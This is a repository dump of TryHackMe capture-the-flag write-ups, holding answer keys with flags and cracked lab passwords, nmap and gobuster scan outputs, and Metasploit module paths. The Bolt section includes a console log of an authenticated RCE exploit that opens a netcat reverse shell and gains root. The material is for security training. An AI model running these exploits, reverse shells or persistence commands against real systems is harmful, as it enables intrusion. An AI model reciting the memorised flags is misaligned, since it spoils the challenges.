├── Advent of Cyber 2 └── README.md ├── Agent Sudo └── README.md ├── Basic Malware RE ├── Ghidra.txt ├── README.md ├── Zip Password.txt ├── strings1.zip ├── strings2.zip └── strings3.zip ├── Blaster ├── CVE-2019-1388.png ├── README.md ├── gobuster_result.txt ├── masscan_result.xml ├── nmap_basic.nmap ├── parzival.png └── retro.png ├── Blue └── README.md ├── Blueprint ├── README.md └── exploitdb.txt ├── BoilerCTF ├── README.md ├── creds.txt ├── gobuster.txt ├── info-rot13.txt ├── info.txt ├── nmap_allports.nmap ├── nmap_basic.nmap └── robots.txt ├── Bolt ├── README.md ├── creds.txt ├── flag.txt ├── login_url.txt └── nmap_basic.nmap ├── C4ptur3 Th3 Fl4g ├── README.md ├── secretaudio.wav └── stegosteg.jpg ├── CC-Pentesting ├── README.md ├── Task 10 - Section 3 - Metasploit Final Walkthrough.txt ├── exam │ ├── gobuster.txt │ ├── gobuster_secret.txt │ ├── hash.txt │ ├── nmap.txt │ ├── secret.txt │ └── ssh.txt ├── gobuster_10.10.56.144 ├── gobuster_xxa_10.10.56.144 └── nmap_10.10.253.33.txt ├── CC-Steganography ├── README.md ├── Tools │ ├── exiftool.txt │ ├── sonic visualiser.txt │ ├── steghide.txt │ ├── stegoveritas.txt │ └── zsteg.txt └── spect │ ├── KTrtNI5.png │ ├── exam1.jpeg │ ├── exam2.wav │ ├── happynoot.jpeg │ ├── jpeg1.jpeg │ ├── jpeg2.jpeg │ ├── jpeg3.jpeg │ ├── png1.png │ ├── qrcode(edited).png │ ├── qrcode.png │ ├── wav1.wav │ └── wav2.wav ├── Djinn └── README.md ├── Google Dorking └── README.md ├── Hydra ├── README.md ├── flag2.txt ├── ssh.png ├── ssh.txt ├── web.png └── web.txt ├── Ignite ├── CVE-2018-16763.py ├── README.md ├── database.php ├── database.txt ├── exploit-db.txt └── nmap_basic.nmap ├── Inclusion ├── README.md ├── nmap_basic.nmap ├── passwd.txt ├── root.png ├── root.txt ├── socat.txt ├── ssh.png ├── ssh.txt └── view-source_10.10.43.97_article_name=.._.._.._.._.._.._etc_passwd.html ├── Intro to Malware Analysis └── README.md ├── Introductory Researching └── README.md ├── Learn Linux ├── README.md ├── creds.txt ├── find-shiba4.png ├── find_user.png ├── flag.png ├── shiba2.png ├── shiba3.png ├── shiba4.png └── test1234.png ├── Lord of the Root ├── README.md ├── creds.txt ├── exploit.rar ├── nmap_10.10.213.122.txt └── nmap_allport_10.10.213.122.txt ├── Mr. Robot CTF └── README.md ├── OWASP Juice Shop └── README.md ├── OhSINT ├── README.md └── WindowsXP.jpg ├── OpenVPN └── README.md ├── Overpass ├── README.md ├── gobuster.txt ├── id_rsa ├── id_rsa_hash ├── nmap_basic.nmap ├── root.txt ├── ssh_creds.txt ├── todo.txt └── user.txt ├── Pentest Questionaire └── README.md ├── PentestQuiz └── README.md ├── Pickle Rick ├── README.md ├── gobuster.txt ├── login.txt ├── nmap_basic.nmap ├── robot.txt └── username.txt ├── Post-Exploitation-Basics ├── README.md ├── bloodhound │ ├── bloodhound.txt │ ├── kerberoastable-users.png │ ├── loot.zip │ └── service.png ├── mimikatz │ ├── hashcat.txt │ └── mimikatz.txt ├── powerview │ ├── flag.txt │ └── powerview.txt └── server-manager │ ├── dashbord.png │ ├── event-logs.png │ ├── login.png │ ├── rdesktop.txt │ └── sql-service-password.png ├── README.md ├── RP Metasploit └── README.md ├── RP Nmap ├── README.md ├── nmap --script vuln 10.10.34.127.txt ├── nmap -A 10.10.34.127.txt ├── nmap -sS 10.10.34.127 .txt └── nmap -sV -p 22 10.10.34.127.txt ├── RP PS-Empire ├── PowerShell Empire.txt ├── README.md ├── exploit.txt └── nmap_vuln.nmap ├── Retro ├── CVE-2017-0213_x64.tar.xz └── README.md ├── Reversing ELF ├── README.md ├── crackme1 ├── crackme2 ├── crackme3 ├── crackme4 ├── crackme5 ├── crackme6 ├── crackme7 └── crackme8 ├── Shodan.io └── README.md ├── Simple CTF ├── CVE.txt ├── README.md ├── creds.txt ├── exploit.py ├── exploit.txt ├── flag.txt ├── gobuster.txt ├── nmap -p 1000 10.10.99.100.txt ├── nmap -p 80 -A -v 10.10.99.100.txt ├── robots.txt └── ssh.txt ├── Sudo Buffer Overflow └── README.md ├── Sudo Security Bypass └── README.md ├── The Find Command └── README.md ├── TomGhost ├── 48143.py ├── README.md ├── credential.pgp ├── creds_merlin ├── creds_skyfuck ├── flag.txt ├── hash ├── nmap_10.10.18.28.txt └── tryhackme.asc ├── TryHackMe.png ├── Vulnversity ├── Python PTY.txt ├── README.md ├── gobuster.txt ├── php-reverse-shell.txt ├── root.txt ├── shell.tar.xz ├── suid.txt └── user.txt ├── Welcome To TryHackMe └── README.md ├── WgelCTF ├── README.md ├── gobuster_result.txt ├── gobuster_sitemap_result.txt ├── id_rsa ├── id_rsa.png ├── nmap_basic.nmap ├── root.png ├── ssh.png ├── ssh2john.txt └── user.png └── Wifi Hacking 101 ├── Captures.tar.gz └── README.md /Agent Sudo/README.md: -------------------------------------------------------------------------------- 1 | # Agent Sudo | https://tryhackme.com/room/agentsudo 2 | 3 | ### [Task 2] Enumerate 4 | 5 | #1 How many open ports? : `3` 6 | 7 | #2 How you redirect yourself to a secret page? : `user-agent` 8 | 9 | #3 What is the agent name? : `chris` 10 | 11 | ### [Task 3] Hash cracking and brute-force 12 | 13 | #1 FTP password : `crystal` 14 | 15 | #2 Zip file password : `alien` 16 | 17 | #3 steg password : `Area51` 18 | 19 | #4 Who is the other agent (in full name)? : `James` 20 | 21 | #5 SSH password : `hackerrules!` 22 | 23 | ### [Task 4] Capture the user flag 24 | 25 | #1 What is the user flag? : `b03d975e8c92a7c04146cfa7a5a313c7` 26 | 27 | #2 What is the incident of the photo called? : `Roswell alien autopsy` 28 | 29 | ### [Task 5] Privilege escalation 30 | 31 | #1 CVE number for the escalation : `CVE-2019-14287` 32 | 33 | #2 What is the root flag? : `b53a02f55b57d4439e3341834d70c062` 34 | 35 | #3 (Bonus) Who is Agent R? : `DesKel` 36 | -------------------------------------------------------------------------------- /Basic Malware RE/Ghidra.txt: -------------------------------------------------------------------------------- 1 | Ghidra : https://ghidra-sre.org/ -------------------------------------------------------------------------------- /Basic Malware RE/README.md: -------------------------------------------------------------------------------- 1 | # Basic Malware RE | https://tryhackme.com/room/basicmalwarere 2 | 3 | ### [Task 2] Strings :: Challenge 1 (strings1) 4 | 5 | This executable prints an MD5 Hash on the screen when executed. Can you grab the exact flag? 6 | 7 | Note: You don't need to run the executable! 8 | 9 | #1 What is the flag of which that MD5 gets generated? : ```FLAG{CAN-I-MAKE-IT-ANYMORE-OBVIOUS}``` 10 | 11 | ### [Task 3] Strings :: Challenge 2 (strings2) 12 | 13 | This executable prints an MD5 Hash on the screen when executed. Can you grab the exact flag? 14 | 15 | Note: You don't need to run the executable! 16 | 17 | #1 What is the flag of which that MD5 gets generated? : ```FLAG{STACK-STRINGS-ARE-BEST-STRINGS}``` 18 | 19 | ### [Task 4] Strings 3 :: Challenge 3 (strings3) 20 | 21 | This executable prints an MD5 Hash on the screen when executed. Can you grab the exact flag? 22 | 23 | Note: You don't need to run the executable! 24 | 25 | #1 What is the flag of which that MD5 gets generated? : ```FLAG{RESOURCES-ARE-POPULAR-FOR-MALWARE}``` 26 | -------------------------------------------------------------------------------- /Basic Malware RE/Zip Password.txt: -------------------------------------------------------------------------------- 1 | MalwareTech -------------------------------------------------------------------------------- /Basic Malware RE/strings1.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Basic Malware RE/strings1.zip -------------------------------------------------------------------------------- /Basic Malware RE/strings2.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Basic Malware RE/strings2.zip -------------------------------------------------------------------------------- /Basic Malware RE/strings3.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Basic Malware RE/strings3.zip -------------------------------------------------------------------------------- /Blaster/CVE-2019-1388.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Blaster/CVE-2019-1388.png -------------------------------------------------------------------------------- /Blaster/README.md: -------------------------------------------------------------------------------- 1 | # Blaster | https://tryhackme.com/room/blaster 2 | 3 | ### [Task 2] Activate Forward Scanners and Launch Proton Torpedoes 4 | 5 | #1 How many ports are open on our target system? : `2` 6 | 7 | #2 Looks like there's a web server running, what is the title of the page we discover when browsing to it? : `IIS Windows Server` 8 | 9 | #3 Interesting, let's see if there's anything else on this web server by fuzzing it. What hidden directory do we discover? : `/retro` 10 | 11 | #4 Navigate to our discovered hidden directory, what potential username do we discover? : `wade` 12 | 13 | #5 Crawling through the posts, it seems like our user has had some difficulties logging in recently. What possible password do we discover? : `parzival` 14 | 15 | #6 Log into the machine via Microsoft Remote Desktop (MSRDP) and read user.txt. What are it's contents? : `THM{HACK_PLAYER_ONE}` 16 | 17 | ### [Task 3] Breaching the Control Room 18 | 19 | #1 When enumerating a machine, it's often useful to look at what the user was last doing. Look around the machine and see if you can find the CVE which was researched on this server. What CVE was it? : `CVE-2019-1388` 20 | 21 | #2 Looks like an executable file is necessary for exploitation of this vulnerability and the user didn't really clean up very well after testing it. What is the name of this executable? : `hhupd` 22 | 23 | #4 Now that we've spawned a terminal, let's go ahead and run the command 'whoami'. What is the output of running this? : `nt authority\system` 24 | 25 | #5 Now that we've confirmed that we have an elevated prompt, read the contents of root.txt on the Administrator's desktop. What are the contents? Keep your terminal up after exploitation so we can use it in task four! : `THM{COIN_OPERATED_EXPLOITATION}` 26 | 27 | ### [Task 4] Adoption into the Collective 28 | 29 | #2 First, let's set the target to PSH (PowerShell). Which target number is PSH? : `2` 30 | 31 | #6 Last but certainly not least, let's look at persistence mechanisms via Metasploit. What command can we run in our meterpreter console to setup persistence which automatically starts when the system boots? Don't include anything beyond the base command and the option for boot startup. : `run persistence -X` -------------------------------------------------------------------------------- /Blaster/gobuster_result.txt: -------------------------------------------------------------------------------- 1 | gobuster dir -u http://10.10.123.29/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 2 | =============================================================== 3 | Gobuster v3.0.1 4 | by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) 5 | =============================================================== 6 | [+] Url: http://10.10.123.29/ 7 | [+] Threads: 10 8 | [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 9 | [+] Status codes: 200,204,301,302,307,401,403 10 | [+] User Agent: gobuster/3.0.1 11 | [+] Timeout: 10s 12 | =============================================================== 13 | 2020/05/28 23:56:02 Starting gobuster 14 | =============================================================== 15 | /retro (Status: 301) 16 | Progress: 10600 / 87665 (12.09%)^C 17 | [!] Keyboard interrupt detected, terminating. 18 | =============================================================== 19 | 2020/05/29 00:00:05 Finished 20 | =============================================================== 21 | 22 | -------------------------------------------------------------------------------- /Blaster/masscan_result.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 |
7 |
8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /Blaster/nmap_basic.nmap: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Thu May 28 23:49:25 2020 as: nmap -sCSV -A -O -oN nmap_basic.nmap -Pn 10.10.123.29 2 | Nmap scan report for 10.10.123.29 3 | Host is up (0.22s latency). 4 | Not shown: 998 filtered ports 5 | PORT STATE SERVICE VERSION 6 | 80/tcp open http Microsoft IIS httpd 10.0 7 | | http-methods: 8 | |_ Potentially risky methods: TRACE 9 | |_http-server-header: Microsoft-IIS/10.0 10 | |_http-title: IIS Windows Server 11 | 3389/tcp open ms-wbt-server Microsoft Terminal Services 12 | | rdp-ntlm-info: 13 | | Target_Name: RETROWEB 14 | | NetBIOS_Domain_Name: RETROWEB 15 | | NetBIOS_Computer_Name: RETROWEB 16 | | DNS_Domain_Name: RetroWeb 17 | | DNS_Computer_Name: RetroWeb 18 | | Product_Version: 10.0.14393 19 | |_ System_Time: 2020-05-28T18:19:57+00:00 20 | | ssl-cert: Subject: commonName=RetroWeb 21 | | Not valid before: 2020-05-21T21:44:38 22 | |_Not valid after: 2020-11-20T21:44:38 23 | |_ssl-date: 2020-05-28T18:20:00+00:00; +1s from scanner time. 24 | Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port 25 | Device type: general purpose 26 | Running (JUST GUESSING): Microsoft Windows 2016 (87%) 27 | OS CPE: cpe:/o:microsoft:windows_server_2016 28 | Aggressive OS guesses: Microsoft Windows Server 2016 (87%) 29 | No exact OS matches for host (test conditions non-ideal). 30 | Network Distance: 2 hops 31 | Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows 32 | 33 | TRACEROUTE (using port 3389/tcp) 34 | HOP RTT ADDRESS 35 | 1 219.13 ms 10.9.0.1 36 | 2 219.32 ms 10.10.123.29 37 | 38 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 39 | # Nmap done at Thu May 28 23:50:00 2020 -- 1 IP address (1 host up) scanned in 34.93 seconds 40 | -------------------------------------------------------------------------------- /Blaster/parzival.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Blaster/parzival.png -------------------------------------------------------------------------------- /Blaster/retro.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Blaster/retro.png -------------------------------------------------------------------------------- /Blue/README.md: -------------------------------------------------------------------------------- 1 | # Blue | https://tryhackme.com/room/blue 2 | 3 | ### [Task 1] Recon 4 | 5 | #2 How many ports are open with a port number under 1000? : ```3``` 6 | 7 | #3 What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067) : ```ms17-010``` 8 | 9 | ### [Task 2] Gain Access 10 | 11 | #2 Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........) : ```exploit/windows/smb/ms17_010_eternalblue``` 12 | 13 | #3 Show options and set the one required value. What is the name of this value? (All caps for submission) : ```RHOST``` 14 | 15 | ### [Task 3] Escalate 16 | 17 | #1 If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected) : ```post/multi/manager/shell_to_meterpreter``` 18 | 19 | #2 Select this (use MODULE_PATH). Show options, what option are we required to change? (All caps for answer) : ```SESSION``` 20 | 21 | ### [Task 4] Cracking 22 | 23 | #1 Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user? : ```jon``` 24 | 25 | #2 Copy this password hash to a file and research how to crack it. What is the cracked password? : ```azlgfna22``` 26 | 27 | ### [Task 5] Find flags! 28 | 29 | #1 Flag1? (Only submit the flag contents {CONTENTS}) : ```access_the_machine``` 30 | 31 | #2 Flag2? *Errata: Windows really doesn't like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This relatively rare, however, it can happen. : ```sam_database_elevated_access``` 32 | 33 | #3 flag3? : ```admin_documents_can_be_valuable``` -------------------------------------------------------------------------------- /Blueprint/README.md: -------------------------------------------------------------------------------- 1 | # Blueprint | https://tryhackme.com/room/blueprint 2 | 3 | ### [Task 1] Blueprint 4 | 5 | Do you have what is takes to hack into this Windows Machine? 6 | 7 | It might take around 3-4 minutes for the machine to boot. 8 | 9 | #1 "Lab" user NTML hash decrypted : ```30e87bf999828446a1c1209ddde4c450 = googleplus``` 10 | 11 | #2 root.txt : ```THM{aea1e3ce6fe7f89e10cea833ae009bee}``` 12 | -------------------------------------------------------------------------------- /Blueprint/exploitdb.txt: -------------------------------------------------------------------------------- 1 | https://www.exploit-db.com/exploits/44374 -------------------------------------------------------------------------------- /BoilerCTF/README.md: -------------------------------------------------------------------------------- 1 | # Boiler CTF | https://tryhackme.com/room/boilerctf2 2 | 3 | ### [Task 1] Questions #1 4 | 5 | Intermediate level CTF. Just enumerate, you'll get there. 6 | 7 | #1 File extension after anon login : `txt` 8 | 9 | #2 What is on the highest port? : `ssh` 10 | 11 | #3 What's running on port 10000? : `webmin` 12 | 13 | #4 Can you exploit the service running on that port? (yay/nay answer) : `nay` 14 | 15 | #5 What's CMS can you access? : `Joomla` 16 | 17 | #7 The interesting file name in the folder? : `log.txt` 18 | 19 | ### [Task 2] Questions #2 20 | 21 | You can complete this with manual enumeration, but do it as you wish 22 | 23 | #1 Where was the other users pass stored(no extension, just the name)? : `backup` 24 | 25 | #2 user.txt : `You made it till here, well done.` 26 | 27 | #3 What did you exploit to get the privileged user? : `find` 28 | 29 | #4 root.txt : `It wasn’t that hard, was it?` 30 | -------------------------------------------------------------------------------- /BoilerCTF/creds.txt: -------------------------------------------------------------------------------- 1 | basterd : superduperp@$$ 2 | 3 | stoner : superduperp@$$no1knows -------------------------------------------------------------------------------- /BoilerCTF/gobuster.txt: -------------------------------------------------------------------------------- 1 | /.hta (Status: 403) 2 | /.htaccess (Status: 403) 3 | /.htpasswd (Status: 403) 4 | /index.html (Status: 200) 5 | /joomla (Status: 301) 6 | /manual (Status: 301) 7 | /robots.txt (Status: 200) 8 | /server-status (Status: 403) 9 | -------------------------------------------------------------------------------- /BoilerCTF/info-rot13.txt: -------------------------------------------------------------------------------- 1 | Just wanted to see if you find it. Lol. Remember: Enumeration is the key! -------------------------------------------------------------------------------- /BoilerCTF/info.txt: -------------------------------------------------------------------------------- 1 | Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl! 2 | -------------------------------------------------------------------------------- /BoilerCTF/nmap_allports.nmap: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Thu Jun 18 08:11:28 2020 as: nmap -p- -oN nmap.allports.nmap 10.10.52.211 2 | Nmap scan report for 10.10.52.211 3 | Host is up (0.23s latency). 4 | Not shown: 65531 closed ports 5 | PORT STATE SERVICE 6 | 21/tcp open ftp 7 | 80/tcp open http 8 | 10000/tcp open snet-sensor-mgmt 9 | 55007/tcp open unknown 10 | 11 | # Nmap done at Thu Jun 18 08:30:36 2020 -- 1 IP address (1 host up) scanned in 1147.95 seconds 12 | -------------------------------------------------------------------------------- /BoilerCTF/nmap_basic.nmap: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Thu Jun 18 07:58:49 2020 as: nmap -sS -sC -sV -A -O -Pn -oN nmap_basic.nmap 10.10.52.211 2 | Nmap scan report for 10.10.52.211 3 | Host is up (0.23s latency). 4 | Not shown: 997 closed ports 5 | PORT STATE SERVICE VERSION 6 | 21/tcp open ftp vsftpd 3.0.3 7 | |_ftp-anon: Anonymous FTP login allowed (FTP code 230) 8 | | ftp-syst: 9 | | STAT: 10 | | FTP server status: 11 | | Connected to ::ffff:10.9.18.54 12 | | Logged in as ftp 13 | | TYPE: ASCII 14 | | No session bandwidth limit 15 | | Session timeout in seconds is 300 16 | | Control connection is plain text 17 | | Data connections will be plain text 18 | | At session startup, client count was 3 19 | | vsFTPd 3.0.3 - secure, fast, stable 20 | |_End of status 21 | 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 22 | | http-robots.txt: 1 disallowed entry 23 | |_/ 24 | |_http-server-header: Apache/2.4.18 (Ubuntu) 25 | |_http-title: Apache2 Ubuntu Default Page: It works 26 | 10000/tcp open http MiniServ 1.930 (Webmin httpd) 27 | |_http-server-header: MiniServ/1.930 28 | |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1). 29 | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). 30 | TCP/IP fingerprint: 31 | OS:SCAN(V=7.80%E=4%D=6/18%OT=21%CT=1%CU=42240%PV=Y%DS=2%DC=T%G=Y%TM=5EEAD19 32 | OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=102%TI=Z%CI=I%II=I%TS=8)OPS 33 | OS:(O1=M508ST11NW6%O2=M508ST11NW6%O3=M508NNT11NW6%O4=M508ST11NW6%O5=M508ST1 34 | OS:1NW6%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN 35 | OS:(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A 36 | OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R 37 | OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F 38 | OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N% 39 | OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD 40 | OS:=S) 41 | 42 | Network Distance: 2 hops 43 | Service Info: OS: Unix 44 | 45 | TRACEROUTE (using port 111/tcp) 46 | HOP RTT ADDRESS 47 | 1 242.68 ms 10.9.0.1 48 | 2 242.74 ms 10.10.52.211 49 | 50 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 51 | # Nmap done at Thu Jun 18 07:59:48 2020 -- 1 IP address (1 host up) scanned in 59.93 seconds 52 | -------------------------------------------------------------------------------- /BoilerCTF/robots.txt: -------------------------------------------------------------------------------- 1 | User-agent: * 2 | Disallow: / 3 | 4 | /tmp 5 | /.ssh 6 | /yellow 7 | /not 8 | /a+rabbit 9 | /hole 10 | /or 11 | /is 12 | /it 13 | 14 | 079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075 15 | -------------------------------------------------------------------------------- /Bolt/README.md: -------------------------------------------------------------------------------- 1 | # Bolt | https://tryhackme.com/room/bolt 2 | 3 | ### [Task 2] Hack your way into the machine! 4 | 5 | #1 What port number has a web server with a CMS running? : `8000` 6 | 7 | #2 What is the username we can find in the CMS? : `bolt` 8 | 9 | #3 What is the password we can find for the username? : `boltadmin123` 10 | 11 | #4 What version of the CMS is installed on the server? (Ex: Name 1.1.1) : `Bolt 3.7.1` 12 | 13 | #5 There's an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What's its EDB-ID? : `48296` 14 | 15 | #6 Metasploit recently added an exploit module for this vulnerability. What's the full path for this exploit? (Ex: exploit/....) : `exploit/unix/webapp/bolt_authenticated_rce` 16 | 17 | #8 Look for flag.txt inside the machine. : `THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}` 18 | -------------------------------------------------------------------------------- /Bolt/creds.txt: -------------------------------------------------------------------------------- 1 | bolt : boltadmin123 2 | -------------------------------------------------------------------------------- /Bolt/flag.txt: -------------------------------------------------------------------------------- 1 | msf5 exploit(unix/webapp/bolt_authenticated_rce) > show options 2 | 3 | Module options (exploit/unix/webapp/bolt_authenticated_rce): 4 | 5 | Name Current Setting Required Description 6 | ---- --------------- -------- ----------- 7 | FILE_TRAVERSAL_PATH ../../../public/files yes Traversal path from "/files" on the web server to "/root" on the server 8 | PASSWORD yes Password to authenticate with 9 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 10 | RHOSTS 10.10.138.124 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' 11 | RPORT 8000 yes The target port (TCP) 12 | SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. 13 | SRVPORT 8080 yes The local port to listen on. 14 | SSL false no Negotiate SSL/TLS for outgoing connections 15 | SSLCert no Path to a custom SSL certificate (default is randomly generated) 16 | TARGETURI / yes Base path to Bolt CMS 17 | URIPATH no The URI to use for this exploit (default is random) 18 | USERNAME yes Username to authenticate with 19 | VHOST no HTTP server virtual host 20 | 21 | 22 | Payload options (cmd/unix/reverse_netcat): 23 | 24 | Name Current Setting Required Description 25 | ---- --------------- -------- ----------- 26 | LHOST 10.9.18.54 yes The listen address (an interface may be specified) 27 | LPORT 1337 yes The listen port 28 | 29 | 30 | Exploit target: 31 | 32 | Id Name 33 | -- ---- 34 | 2 Linux (cmd) 35 | 36 | 37 | msf5 exploit(unix/webapp/bolt_authenticated_rce) > set USERNAME bolt 38 | USERNAME => bolt 39 | msf5 exploit(unix/webapp/bolt_authenticated_rce) > set PASSWORD boltadmin123 40 | PASSWORD => boltadmin123 41 | msf5 exploit(unix/webapp/bolt_authenticated_rce) > check 42 | [+] 10.10.138.124:8000 - The target is vulnerable. Successfully changed the /bolt/profile username to PHP $_GET variable "tkyv". 43 | 44 | [+] Reverted user profile back to original state. 45 | msf5 exploit(unix/webapp/bolt_authenticated_rce) > run 46 | 47 | [*] Started reverse TCP handler on 10.9.18.54:1337 48 | [*] Executing automatic check (disable AutoCheck to override) 49 | [+] The target is vulnerable. Successfully changed the /bolt/profile username to PHP $_GET variable "pnqu". 50 | [*] Found 4 potential token(s) for creating .php files. 51 | [+] Deleted file pfgkpdney.php. 52 | [+] Deleted file qrmvbrrn.php. 53 | [+] Deleted file qpckghmyee.php. 54 | [+] Used token fc7f7ee3bfd3001342ae73312b to create ebaeuqmekikk.php. 55 | [*] Attempting to execute the payload via "/files/ebaeuqmekikk.php?pnqu=`payload`" 56 | [*] Command shell session 1 opened (10.9.18.54:1337 -> 10.10.138.124:39876) at 2020-08-13 12:38:23 +0530 57 | [!] No response, may have executed a blocking payload! 58 | [+] Deleted file ebaeuqmekikk.php. 59 | [+] Reverted user profile back to original state. 60 | 61 | ls 62 | index.html 63 | pwd 64 | /home/bolt/public/files 65 | whoami 66 | root 67 | cd /root/ 68 | ls 69 | ls -la 70 | total 36 71 | drwx------ 5 root root 4096 Jul 18 19:54 . 72 | drwxr-xr-x 27 root root 4096 Jul 18 19:30 .. 73 | -rw------- 1 root root 2044 Jul 18 20:47 .bash_history 74 | -rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc 75 | drwxr-xr-x 3 root root 4096 Jul 18 19:32 .composer 76 | drwxr-xr-x 3 root root 4096 Jul 18 19:50 .local 77 | -rw-r--r-- 1 root root 148 Aug 17 2015 .profile 78 | -rw-r--r-- 1 root root 66 Jul 18 19:53 .selected_editor 79 | drwx------ 2 root root 4096 Jul 18 18:57 .ssh 80 | cd / 81 | find / -type f -name "flag.txt" 82 | /home/flag.txt 83 | cat /home/flag.txt 84 | THM{wh0_d035nt_l0ve5_b0l7_r1gh7?} 85 | 86 | 87 | -------------------------------------------------------------------------------- /Bolt/login_url.txt: -------------------------------------------------------------------------------- 1 | http://10.10.138.124:8000/bolt/login 2 | -------------------------------------------------------------------------------- /Bolt/nmap_basic.nmap: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Thu Aug 13 12:06:45 2020 as: nmap -sCV -T4 -oN nmap_basic.nap 10.10.138.124 2 | Nmap scan report for 10.10.138.124 3 | Host is up (0.25s latency). 4 | Not shown: 997 closed ports 5 | PORT STATE SERVICE VERSION 6 | 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 7 | | ssh-hostkey: 8 | | 2048 f3:85:ec:54:f2:01:b1:94:40:de:42:e8:21:97:20:80 (RSA) 9 | | 256 77:c7:c1:ae:31:41:21:e4:93:0e:9a:dd:0b:29:e1:ff (ECDSA) 10 | |_ 256 07:05:43:46:9d:b2:3e:f0:4d:69:67:e4:91:d3:d3:7f (ED25519) 11 | 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 12 | |_http-server-header: Apache/2.4.29 (Ubuntu) 13 | |_http-title: Apache2 Ubuntu Default Page: It works 14 | 8000/tcp open http (PHP 7.2.32-1) 15 | | fingerprint-strings: 16 | | FourOhFourRequest: 17 | | HTTP/1.0 404 Not Found 18 | | Date: Thu, 13 Aug 2020 06:37:04 GMT 19 | | Connection: close 20 | | X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1 21 | | Cache-Control: private, must-revalidate 22 | | Date: Thu, 13 Aug 2020 06:37:04 GMT 23 | | Content-Type: text/html; charset=UTF-8 24 | | pragma: no-cache 25 | | expires: -1 26 | | X-Debug-Token: 3207d3 27 | | 28 | | 29 | | 30 | | 31 | | 32 | | Bolt | A hero is unleashed 33 | | 34 | | 35 | | 36 | | 37 | | 38 | | 39 | | href="#main-content" class="vis 40 | | GetRequest: 41 | | HTTP/1.0 200 OK 42 | | Date: Thu, 13 Aug 2020 06:37:02 GMT 43 | | Connection: close 44 | | X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1 45 | | Cache-Control: public, s-maxage=600 46 | | Date: Thu, 13 Aug 2020 06:37:02 GMT 47 | | Content-Type: text/html; charset=UTF-8 48 | | X-Debug-Token: 92bfd5 49 | | 50 | | 51 | | 52 | | 53 | | 54 | | Bolt | A hero is unleashed 55 | | 56 | | 57 | | 58 | | 59 | | 60 | | 61 | |_ 62 | |_http-generator: Bolt 63 | |_http-title: Bolt | A hero is unleashed 64 | 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : 65 | SF-Port8000-TCP:V=7.80%I=7%D=8/13%Time=5F34DF8D%P=x86_64-pc-linux-gnu%r(Ge 66 | 